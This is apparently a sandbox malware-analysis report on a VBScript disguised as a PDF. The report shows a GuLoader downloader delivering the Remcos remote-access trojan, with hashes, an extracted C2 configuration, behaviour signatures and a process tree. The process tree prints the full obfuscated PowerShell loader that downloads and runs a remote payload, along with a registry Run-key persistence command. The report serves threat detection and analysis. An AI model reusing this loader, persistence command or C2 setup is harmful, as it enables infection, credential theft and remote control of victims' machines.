Overview

overview

10

Static

static

1

VDF645425140·pdf.vbs

windows7-x64

10

VDF645425140·pdf.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04-09-2024 08:30

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    VDF645425140·pdf.vbs

  • Size

    25KB

  • MD5

    f758726ca8e3639be7fb0ff04a7a8c4a

  • SHA1

    14d882ba6389b41a57f012c409080d7d1e872ac7

  • SHA256

    049feb6dcf68c869a98bf8fe7fe64434e8e27c18954a290094d636ac0bb2be23

  • SHA512

    23961d2ad2057c002c69cb78a801f0b044752acd8cbbe9905aca11ef9ccea1149a8c211c893d71917589ad9d5e1ba2853df59a97b3824cafbcdee1060947124e

  • SSDEEP

    384:iinVweRHN57gFx1JMhH1HxE2OUZrBclg0tMlDNtjwsLwi+eRrs+hNXusOKSqILB7:iiYgKXpDcqQo

Score
10/10
guloaderremcosremotehostcollectioncredential_accessdiscoverydownloaderexecutionpersistenceratstealer

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

a458386d9.duckdns.org:3256

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    true

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    true

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-U25QJ2

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

    credential_accessstealer
  • Detected Nirsoft tools 3 IoCs

    Free utilities often used by attackers which can steal passwords, product keys, etc.

  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Blocklisted process makes network request 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
    collection
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 60 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies registry class 56 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious behavior: MapViewOfSection 60 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\VDF645425140·pdf.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2436
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.Name) {$Fluoboride++;$Frothier+='subst';$Frothier+='r';}$Frothier+='ing';Function Incrassation($Tombing){$Comebacker=$Tombing.Length-$Fluoboride;For( $Unavailably=5;$Unavailably -lt $Comebacker;$Unavailably+=6){$Vertebrally+=$Tombing.$Frothier.'Invoke'( $Unavailably, $Fluoboride);}$Vertebrally;}function snedriver($Kurveoplsning){ & ($Fatsia) ($Kurveoplsning);}$Precipitantness=Incrassation ' NonrMSlurkoN nsezMaaleiSkandlAbsollD,horaBygge/Numme5Gage..,oged0Limni Ergo(Tsar.W maaiMinkan Non.dHideroVoyagwBismusUsher TilbaNSpg.lTTorni omp1Trans0Knuse.We.he0Poxal;An,st SpeedWT naciTilfinSlank6Bart.4T.ela;A.tid SubcexS nds6.eate4Trape; Tocc Over rChondvAmido:Proli1,uamf2 ,dda1Der i.Ea tl0Togst)Tilbu TartuG,erleeSkip,cForhjkHandeoEyesh/Semin2Creos0Skitt1Benzi0Inter0Agurk1 kaot0Bronc1Tegne LopseFPrecoiT.xinr Tey eLissif ClavoButl.xDrjde/Disin1Rust 2Pl.sm1Indhe.Kunds0 So i ';$Unavailablyndgivende=Incrassation ',striUKortksAn,lceOtiorrSvi.g- .nsvA.rerrgRefere P,renYperntSfyrb ';$Capriccioso233=Incrassation 'Afdanh PrimtAlairtMidmopSup rsPakis:,nqui/Pric./T ansdagnatrFo.ldi.olyfvFredheFilms.AutoogNo.bio P,ero Pre gGendalDuodeePersi.RevelcTrivsoYak,mm,emue/B uebuPacebcmanch?NrigsebarkexToftep UdjvoNoninrS,ffet .ent= Svand ApanoBesk,wLgnhantrs,nl DialoPyroaaTerridcombc&CentriTr midRe.rn=For a1Tvelye No,ibDiffe6.ridt-.rbli2PrimeDKretexPropei R.siA,ndviPArsen3 FibeZFasan9BisttMSa,amPSyns,P Skjoj R,ssMFadlsEOutdo7FastsiCocklO Glau4 DimeHPhysi4Une,tV BogmI.kannZProtilEfte UKursnf StosZb.lab ';$Transportfly=Incrassation 'overf>Reson ';$Fatsia=Incrassation 'Brnefi bet,e BiotxFresk ';$Ceiler='Licensaftale';$Virgulate = Incrassation ' tileTragtcNymphhRela,oMegap mulig%Albu,aAffinp innpDefskd Knita SalotTunkeaCompl%Aphot\AskorDM.lhiaCgi.gl helimWeldiaKlatrtFlammi.navnn T.lleCytodr .pernQuadreFremlsTomm .AssemS ForneAkkumlPolit lssen&Goodl&Divor dranke austcBrndehBurnsoAntit walbotHydro ';snedriver (Incrassation 'Kortg$ ConcgVrtsllSquibotnd nb SupeaPrev.lKonfe:Clo,eSEde.tuByttekDrankk InseeUlyk r UnqulPristaSledeg NeutePerpe= Berg( S.rec Alumm Pr,od cht Afsn/ Lipocfebri skibi$catalVSabini Troor Pan.gBrne,uMisealKollaa SwiltstalleSpeed) Ford ');snedriver (Incrassation 'Blegn$Chromg MilllNona oForvrbniddiaFl ppl Himm: BallFUnv tiKvadrs DulskAnetheGastrr.langiSendrsOp reaSemitmSymmelMystii SagsnBrun gUkamp=appel$Co,liCPad yaB.lanpOleocr Brooiwa soc pewycImboliPan.ioLifegsFritioEpig.2Dekag3,rfle3Forsk.GenfosHauntpD udglLangsiUrhantFordy(Slove$XenopTFasterDublea Sf,rnhandesPre.np Gym,oImiterP,rtutStyrefNonaflfiskeyIndda)Ama,r ');snedriver (Incrassation 'We,sm[AlyssNPed sepelomtErico.ObdorSOmstteFlan rAs.lrvBekeniMicrocGenneeSalvoP veroSmrokiBolo.n resttSinupMNavigaUneasnGangea ritig chopeNymferKita ] lit:Sprog:StoejSNonaneProjecStveku Ma rrC.aimiSwisstOmgreySne.rPCommarUdgruoTurm.tForhaoDw.rfc usinoIndsklPanes Baads=gyrop Bacil[IconoNKu.ineClacktYeast.ha.vtSEmusieDisu c FirkuAlminrHaandiVal ltAftegyBestsPV.elsrDwarfoHomoctPneumo PhotcDwaynoP,ojelBe,alTLampay,nudgp Photeflles],elic:Leann:Pr.klTHarcel KanjsRampi1Aarsk2Vinfl ');$Capriccioso233=$Fiskerisamling[0];$Rensdyrmossernes= (Incrassation 'Scutt$ Muddg,evgel,eltioS dsebfod,uaTheonlBukle: kreOUnd.fvKautieSkelerSemichS.urreDmperaDkketd Bouii CastnUsunde HedesHeli s Reko=HovedN Omste BoskwSynke- Trs.O D.spb UndejRaasteOldefc proutForf, forsnS JouryFluidsTilstt U tre,hevemBlods.lun rNR inteHypaltNatur.AverrWStanse SkanbJu,tiCAandel FumaiOpf.eeOliernStemmt');$Rensdyrmossernes+=$Sukkerlage[1];snedriver ($Rensdyrmossernes);snedriver (Incrassation 'Frban$Bil eO virkvTry beOpfanr til.hDecimeUdeeraDensadFibbei,odernMa.theDecumsKomm shexad.P rtiHsociaeBrutta MakrdJytteeBarrarMoralsSthen[Misf $KvabsUblgegnAfvejaSjaskvKalkua GkkeiAstril Mi,daf jltbKaliblBedd,yClotinForsvdSali.gEpi ai UorgvTro,pe UnwanSekredNon ceLa.na]Creir=Deva.$L ninPtyvstrSiam.eKonvecL.tasi KattpPrecoiAssimtDirigaTwinknTosprtMyrtanPrinte In,es CafesRever ');$Semihumbug=Incrassation 'Tunne$U scrOOlofav Pa,heKal.ur Karyh Da aeCrania Helld ntisi MultnSt,ise RespsFo,evsUopsi. S.lgD.oilsoI.praw ,lyanUnreslHusmooCas,oaSwea.d Ro uF OpgjiKast,lOctane F rp(Klema$ inglCSupera Datap EmorrDelfiiS.mmecBru ecSkraaiRabbioHjtudsFakt.oViki 2Ono.a3Tec.i3Hippu,Studi$In.brMC aniiBefr.xLnsyseLeiod)papir ';$Mixe=$Sukkerlage[0];snedriver (Incrassation 'Beewi$,oksegTas olDmkuro.ysteb Mispa Autelskriv:Tid.gNPa tioUnexpn Sspec Mum.hBulleaPackbl Musil nfuseEnchynJalougEp.kui Un.onWurligMario6 Fyri6En.os=L mpe(O,skiT alse,aryosExcavtres,r-LiturPRad oa e,opt.ldsshSneer Mast$FlunkM .avli OratxAfslaeKn al)Vinys ');while (!$Nonchallenging66) {snedriver (Incrassation 'Soute$Tryksg Tapel PrefoUnd,rbKautiaDemonlgarde: Di,tO SafirUfordg Intra SumpnG mmiepigg.tfustytfolkee Nest= ,eso$Uns ttTroldrStrm uHanoleCachi ') ;snedriver $Semihumbug;snedriver (Incrassation 'TommeSOverstEndotaCellur ErittUnmi,-StrudSDesinlbantue InteeGarnipCre a Tal,f4Reple ');snedriver (Incrassation ' Biof$H,drog MagnlSikkeoForhobDetaia,scarlOatla:NonprN.addooSistnnHyperc FinnhN.tmaaKlodslUnapplSpakeeTvrr nluftigampuliVand.nFict,g Ekst6Eldmo6Minel=T rea(NongeTPrecaeEsta,sEftert S.dd-grandP arlabah ctPh,tohSorbo Poin$DiarrM attriD,barxHydroeSupra)Annoy ') ;snedriver (Incrassation ' D,sa$Proang erfel VerboHyp.rb ramia Ld,alS erg:.naphIAnatonKra.tsHyperu SydalFrakka,edhot kspee,okard .eng=Falsu$ProvogBefollOrienoHjemtb ReriahalvrlNae,t:ObeliP SennuDisdetLng,eo,ortuuUnweitPol,rs Neur+ Strm+Map a%Mirac$ iltrFAmtski Gen.sOsculkKonseeElastrAssemiIndvis T,leaDietimCo,nelAlleri RingnStropgT lfa.H.nchcEx,teo NonvuFremfnNonfltCas i ') ;$Capriccioso233=$Fiskerisamling[$Insulated];}$Unmatching=321105;$Unavailablynequal=30275;snedriver (Incrassation 'Kuns $PlaisgP,isalMineroMon.mbBe teaBilfolSa,ir:BlseiBAnilirP,obli ShepgErotig Bdede.ilmurin.egnDeliketermis.usma Lieni=Gastr S inGTen neH,teltMarks-deltiCPrejuoReplenRetletAarsoelystsnMunketBlari ,alif$ TraiMOxybriVul ax HypeeKryp, ');snedriver (Incrassation ' Inds$ UtilgPos clTrimeoStenib nfroa DisplOpera:Vatt THewabrKommarSidese.yolfpHagerl RigoaFiloldG,gossB,gvieArgumrG.ydesOphol Taleh=Lgelf Lokal[StoleSTid,ky.dviksKphjttSk.vee jeldmBeami.HypodC disco Hu.onU kravPyopheSemicrorgant Ov.r]Junk.: H.ah:PressFUnr.grChorioBogmimPlattBScobbaStykvs InjueFad b6 Vest4A.ndsS NonrtAp,cerVinkeiInducnGgestgMutat(udvik$AllusBKob.er AcepiUnh.lgPinligSaftseEgiptrHavden snoreUn ers Past)Rocke ');snedriver (Incrassation 'Types$Miamig onpal JuraoBi.ekb.rtegaAborilTil i:P.ddlOUnsupp,ullelLo scaDdmangRoeoprTrifoeTredi Unfas=B.rse Geo o[UltraS ,gelyUnadesOutfatDu feeBerrtmBrand. elvhTbeniteEchinx alaet Dopi.CephaEPar.gnSearsc,lothoAkkomd Re,aiL,fornReusag Alpi]Lugni: Tu.k: Lb tACerioSOtalgCC,nfeIEkserIrulle.OxyneG SkibeGleamt.ynfrS BysstFestsr onariThem nDescogyapok(.uper$Pe sdT MemorWusserOpti.eSkrmbp SocilJunctaC,rtodRedaksDagtjeForldrNonsosGolde)Cathe ');snedriver (Incrassation '.ache$ Smaag.rotel ,rbeoMinigb O.thaSilvilFlydn:Unp aEKlipfx,eindt SynieUfor,rEvol.nLik fs Belih engeiBackppSkole1 Af e3 Moor1R,set=Diazo$KkkenOForlapportmlBroena G ougLillerV kseeRetab.Micros.dskiuSkidebBede.s Una.t Slagr ArkiiElemen BlokgNo.in(Cu li$TheorU RundnFortrm SpriaDrikktNorescsvarfhFugtiiLairmnHybrigMaili,Ox.de$ par UUnadonInhumaVersavNyttiaF.resi Flygl HuwpaPastob P.omlKa enyBestynR.afreVa grqBylanuStr paHobenl ka.u)Stjfo ');snedriver $Externship131;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4688
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Dalmatinernes.Sel && echo t"
        3⤵
          PID:3716
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.Name) {$Fluoboride++;$Frothier+='subst';$Frothier+='r';}$Frothier+='ing';Function Incrassation($Tombing){$Comebacker=$Tombing.Length-$Fluoboride;For( $Unavailably=5;$Unavailably -lt $Comebacker;$Unavailably+=6){$Vertebrally+=$Tombing.$Frothier.'Invoke'( $Unavailably, $Fluoboride);}$Vertebrally;}function snedriver($Kurveoplsning){ & ($Fatsia) ($Kurveoplsning);}$Precipitantness=Incrassation ' NonrMSlurkoN nsezMaaleiSkandlAbsollD,horaBygge/Numme5Gage..,oged0Limni Ergo(Tsar.W maaiMinkan Non.dHideroVoyagwBismusUsher TilbaNSpg.lTTorni omp1Trans0Knuse.We.he0Poxal;An,st SpeedWT naciTilfinSlank6Bart.4T.ela;A.tid SubcexS nds6.eate4Trape; Tocc Over rChondvAmido:Proli1,uamf2 ,dda1Der i.Ea tl0Togst)Tilbu TartuG,erleeSkip,cForhjkHandeoEyesh/Semin2Creos0Skitt1Benzi0Inter0Agurk1 kaot0Bronc1Tegne LopseFPrecoiT.xinr Tey eLissif ClavoButl.xDrjde/Disin1Rust 2Pl.sm1Indhe.Kunds0 So i ';$Unavailablyndgivende=Incrassation ',striUKortksAn,lceOtiorrSvi.g- .nsvA.rerrgRefere P,renYperntSfyrb ';$Capriccioso233=Incrassation 'Afdanh PrimtAlairtMidmopSup rsPakis:,nqui/Pric./T ansdagnatrFo.ldi.olyfvFredheFilms.AutoogNo.bio P,ero Pre gGendalDuodeePersi.RevelcTrivsoYak,mm,emue/B uebuPacebcmanch?NrigsebarkexToftep UdjvoNoninrS,ffet .ent= Svand ApanoBesk,wLgnhantrs,nl DialoPyroaaTerridcombc&CentriTr midRe.rn=For a1Tvelye No,ibDiffe6.ridt-.rbli2PrimeDKretexPropei R.siA,ndviPArsen3 FibeZFasan9BisttMSa,amPSyns,P Skjoj R,ssMFadlsEOutdo7FastsiCocklO Glau4 DimeHPhysi4Une,tV BogmI.kannZProtilEfte UKursnf StosZb.lab ';$Transportfly=Incrassation 'overf>Reson ';$Fatsia=Incrassation 'Brnefi bet,e BiotxFresk ';$Ceiler='Licensaftale';$Virgulate = Incrassation ' tileTragtcNymphhRela,oMegap mulig%Albu,aAffinp innpDefskd Knita SalotTunkeaCompl%Aphot\AskorDM.lhiaCgi.gl helimWeldiaKlatrtFlammi.navnn T.lleCytodr .pernQuadreFremlsTomm .AssemS ForneAkkumlPolit lssen&Goodl&Divor dranke austcBrndehBurnsoAntit walbotHydro ';snedriver (Incrassation 'Kortg$ ConcgVrtsllSquibotnd nb SupeaPrev.lKonfe:Clo,eSEde.tuByttekDrankk InseeUlyk r UnqulPristaSledeg NeutePerpe= Berg( S.rec Alumm Pr,od cht Afsn/ Lipocfebri skibi$catalVSabini Troor Pan.gBrne,uMisealKollaa SwiltstalleSpeed) Ford ');snedriver (Incrassation 'Blegn$Chromg MilllNona oForvrbniddiaFl ppl Himm: BallFUnv tiKvadrs DulskAnetheGastrr.langiSendrsOp reaSemitmSymmelMystii SagsnBrun gUkamp=appel$Co,liCPad yaB.lanpOleocr Brooiwa soc pewycImboliPan.ioLifegsFritioEpig.2Dekag3,rfle3Forsk.GenfosHauntpD udglLangsiUrhantFordy(Slove$XenopTFasterDublea Sf,rnhandesPre.np Gym,oImiterP,rtutStyrefNonaflfiskeyIndda)Ama,r ');snedriver (Incrassation 'We,sm[AlyssNPed sepelomtErico.ObdorSOmstteFlan rAs.lrvBekeniMicrocGenneeSalvoP veroSmrokiBolo.n resttSinupMNavigaUneasnGangea ritig chopeNymferKita ] lit:Sprog:StoejSNonaneProjecStveku Ma rrC.aimiSwisstOmgreySne.rPCommarUdgruoTurm.tForhaoDw.rfc usinoIndsklPanes Baads=gyrop Bacil[IconoNKu.ineClacktYeast.ha.vtSEmusieDisu c FirkuAlminrHaandiVal ltAftegyBestsPV.elsrDwarfoHomoctPneumo PhotcDwaynoP,ojelBe,alTLampay,nudgp Photeflles],elic:Leann:Pr.klTHarcel KanjsRampi1Aarsk2Vinfl ');$Capriccioso233=$Fiskerisamling[0];$Rensdyrmossernes= (Incrassation 'Scutt$ Muddg,evgel,eltioS dsebfod,uaTheonlBukle: kreOUnd.fvKautieSkelerSemichS.urreDmperaDkketd Bouii CastnUsunde HedesHeli s Reko=HovedN Omste BoskwSynke- Trs.O D.spb UndejRaasteOldefc proutForf, forsnS JouryFluidsTilstt U tre,hevemBlods.lun rNR inteHypaltNatur.AverrWStanse SkanbJu,tiCAandel FumaiOpf.eeOliernStemmt');$Rensdyrmossernes+=$Sukkerlage[1];snedriver ($Rensdyrmossernes);snedriver (Incrassation 'Frban$Bil eO virkvTry beOpfanr til.hDecimeUdeeraDensadFibbei,odernMa.theDecumsKomm shexad.P rtiHsociaeBrutta MakrdJytteeBarrarMoralsSthen[Misf $KvabsUblgegnAfvejaSjaskvKalkua GkkeiAstril Mi,daf jltbKaliblBedd,yClotinForsvdSali.gEpi ai UorgvTro,pe UnwanSekredNon ceLa.na]Creir=Deva.$L ninPtyvstrSiam.eKonvecL.tasi KattpPrecoiAssimtDirigaTwinknTosprtMyrtanPrinte In,es CafesRever ');$Semihumbug=Incrassation 'Tunne$U scrOOlofav Pa,heKal.ur Karyh Da aeCrania Helld ntisi MultnSt,ise RespsFo,evsUopsi. S.lgD.oilsoI.praw ,lyanUnreslHusmooCas,oaSwea.d Ro uF OpgjiKast,lOctane F rp(Klema$ inglCSupera Datap EmorrDelfiiS.mmecBru ecSkraaiRabbioHjtudsFakt.oViki 2Ono.a3Tec.i3Hippu,Studi$In.brMC aniiBefr.xLnsyseLeiod)papir ';$Mixe=$Sukkerlage[0];snedriver (Incrassation 'Beewi$,oksegTas olDmkuro.ysteb Mispa Autelskriv:Tid.gNPa tioUnexpn Sspec Mum.hBulleaPackbl Musil nfuseEnchynJalougEp.kui Un.onWurligMario6 Fyri6En.os=L mpe(O,skiT alse,aryosExcavtres,r-LiturPRad oa e,opt.ldsshSneer Mast$FlunkM .avli OratxAfslaeKn al)Vinys ');while (!$Nonchallenging66) {snedriver (Incrassation 'Soute$Tryksg Tapel PrefoUnd,rbKautiaDemonlgarde: Di,tO SafirUfordg Intra SumpnG mmiepigg.tfustytfolkee Nest= ,eso$Uns ttTroldrStrm uHanoleCachi ') ;snedriver $Semihumbug;snedriver (Incrassation 'TommeSOverstEndotaCellur ErittUnmi,-StrudSDesinlbantue InteeGarnipCre a Tal,f4Reple ');snedriver (Incrassation ' Biof$H,drog MagnlSikkeoForhobDetaia,scarlOatla:NonprN.addooSistnnHyperc FinnhN.tmaaKlodslUnapplSpakeeTvrr nluftigampuliVand.nFict,g Ekst6Eldmo6Minel=T rea(NongeTPrecaeEsta,sEftert S.dd-grandP arlabah ctPh,tohSorbo Poin$DiarrM attriD,barxHydroeSupra)Annoy ') ;snedriver (Incrassation ' D,sa$Proang erfel VerboHyp.rb ramia Ld,alS erg:.naphIAnatonKra.tsHyperu SydalFrakka,edhot kspee,okard .eng=Falsu$ProvogBefollOrienoHjemtb ReriahalvrlNae,t:ObeliP SennuDisdetLng,eo,ortuuUnweitPol,rs Neur+ Strm+Map a%Mirac$ iltrFAmtski Gen.sOsculkKonseeElastrAssemiIndvis T,leaDietimCo,nelAlleri RingnStropgT lfa.H.nchcEx,teo NonvuFremfnNonfltCas i ') ;$Capriccioso233=$Fiskerisamling[$Insulated];}$Unmatching=321105;$Unavailablynequal=30275;snedriver (Incrassation 'Kuns $PlaisgP,isalMineroMon.mbBe teaBilfolSa,ir:BlseiBAnilirP,obli ShepgErotig Bdede.ilmurin.egnDeliketermis.usma Lieni=Gastr S inGTen neH,teltMarks-deltiCPrejuoReplenRetletAarsoelystsnMunketBlari ,alif$ TraiMOxybriVul ax HypeeKryp, ');snedriver (Incrassation ' Inds$ UtilgPos clTrimeoStenib nfroa DisplOpera:Vatt THewabrKommarSidese.yolfpHagerl RigoaFiloldG,gossB,gvieArgumrG.ydesOphol Taleh=Lgelf Lokal[StoleSTid,ky.dviksKphjttSk.vee jeldmBeami.HypodC disco Hu.onU kravPyopheSemicrorgant Ov.r]Junk.: H.ah:PressFUnr.grChorioBogmimPlattBScobbaStykvs InjueFad b6 Vest4A.ndsS NonrtAp,cerVinkeiInducnGgestgMutat(udvik$AllusBKob.er AcepiUnh.lgPinligSaftseEgiptrHavden snoreUn ers Past)Rocke ');snedriver (Incrassation 'Types$Miamig onpal JuraoBi.ekb.rtegaAborilTil i:P.ddlOUnsupp,ullelLo scaDdmangRoeoprTrifoeTredi Unfas=B.rse Geo o[UltraS ,gelyUnadesOutfatDu feeBerrtmBrand. elvhTbeniteEchinx alaet Dopi.CephaEPar.gnSearsc,lothoAkkomd Re,aiL,fornReusag Alpi]Lugni: Tu.k: Lb tACerioSOtalgCC,nfeIEkserIrulle.OxyneG SkibeGleamt.ynfrS BysstFestsr onariThem nDescogyapok(.uper$Pe sdT MemorWusserOpti.eSkrmbp SocilJunctaC,rtodRedaksDagtjeForldrNonsosGolde)Cathe ');snedriver (Incrassation '.ache$ Smaag.rotel ,rbeoMinigb O.thaSilvilFlydn:Unp aEKlipfx,eindt SynieUfor,rEvol.nLik fs Belih engeiBackppSkole1 Af e3 Moor1R,set=Diazo$KkkenOForlapportmlBroena G ougLillerV kseeRetab.Micros.dskiuSkidebBede.s Una.t Slagr ArkiiElemen BlokgNo.in(Cu li$TheorU RundnFortrm SpriaDrikktNorescsvarfhFugtiiLairmnHybrigMaili,Ox.de$ par UUnadonInhumaVersavNyttiaF.resi Flygl HuwpaPastob P.omlKa enyBestynR.afreVa grqBylanuStr paHobenl ka.u)Stjfo ');snedriver $Externship131;"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4392
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Dalmatinernes.Sel && echo t"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:2980
          • C:\Program Files (x86)\windows mail\wab.exe
            "C:\Program Files (x86)\windows mail\wab.exe"
            4⤵
            • Suspicious use of NtCreateThreadExHideFromDebugger
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:3416
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Tebbet" /t REG_EXPAND_SZ /d "%Nymarxister% -w 1 $Nonoxidation=(Get-ItemProperty -Path 'HKCU:\Macerative\').Semiquantitatively;%Nymarxister% ($Nonoxidation)"
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:1780
              • C:\Windows\SysWOW64\reg.exe
                REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Tebbet" /t REG_EXPAND_SZ /d "%Nymarxister% -w 1 $Nonoxidation=(Get-ItemProperty -Path 'HKCU:\Macerative\').Semiquantitatively;%Nymarxister% ($Nonoxidation)"
                6⤵
                • Adds Run key to start application
                • System Location Discovery: System Language Discovery
                • Modifies registry key
                PID:5100
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:4736
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:4764
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:4016
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:3716
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:656
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:2512
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:4080
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:2484
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\owmhrixlbtbavjnsnzpandavbzntr"
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:1520
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\yzrrsahnobuffpcwebkcypvmkgfckfpo"
              5⤵
              • Accesses Microsoft Outlook accounts
              • System Location Discovery: System Language Discovery
              PID:2080
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\jtfkt"
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2292
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:1200
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:3332
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:2168
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:2916
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:760
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:3080
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:5048
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:1940
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:116
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:4688
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:2076
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:4700
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:5040
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:1152
